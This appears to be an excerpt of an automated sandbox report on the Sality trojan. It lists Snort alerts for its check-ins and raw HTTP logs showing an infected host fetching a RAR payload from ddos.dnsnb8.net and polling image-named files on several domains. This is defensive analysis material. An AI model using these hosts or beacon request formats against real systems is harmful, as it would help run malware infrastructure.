        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50011 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50012 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50014 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50015 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50016 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50017 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50018 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50020 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50021 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50022 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50023 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50024 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50026 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50027 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50028 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50029 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50030 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63852 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63853 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:63854 -> 44.221.84.105:80
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
        Source: global trafficTCP traffic: 192.168.2.9:49706 -> 44.221.84.105:799
        Source: global trafficUDP traffic: 192.168.2.9:57606 -> 85.17.167.196:9832
        Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
        Source: Joe Sandbox ViewIP Address: 78.46.2.155 78.46.2.155
        Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
        Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e49a2=6179234 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xs.jpg?60b080=25346560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?63977b=19580529 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xs.jpg?71a0be=14893436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?84b38e=43483590 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e6979d=105784651 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?10010fa=33563124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?10da53c=53014452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1209c47=37828750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?13a89f9=164909000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?17b6de9=198930248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1952911=185868151 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1a33e4b=109902124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1b6026e=172232340 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1c98993=269866539 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?20ae1e9=239873375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?224a908=215742000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?256dbec=353221452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?263e0bf=360900279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27da790=167157312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2dce9fa=384258000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2f6b0f9=149164779 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?341e887=546510150 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?34f3b0d=388668763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?362c1e4=113607624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c84448=190368984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3dc8d75=518286248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e9e01a=262635624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?42142ff=692887030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?434c9e5=282273684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?475ad88=299284000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4ae2102=706685202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4c9a32f=401616875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?513542c=255458436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?59e2a88=565509936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?676dbbc=108452796 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6dcc621=690791622 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7591ee5=1109530125 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7ab8dec=1286835000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?811c5c4=406147404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f21b84=600337936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96faab4=1108191980 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9b39c81=651063812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a2ff583=854576015 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a95dff7=1598349231 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bc3818e=986810310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c29ba9f=612184029 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c814e8b=1888207587 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd40c9d=1506564171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d5ebd9e=2018814606 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e924854=-1850289336 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?efa2e6a=-2033475142 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f75905a=1556177436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?fbaba77=527791342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1055bd73=-1828476661 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1122b37b=1437434215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?11c3299b=-1612941709 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1208a479=1210225124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?125c9be5=924177327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?12dacc76=1265316312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?13a86083=-1326750565 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?14106f9c=673242936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?14890695=-1538771800 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; snkz=8.46.123.33
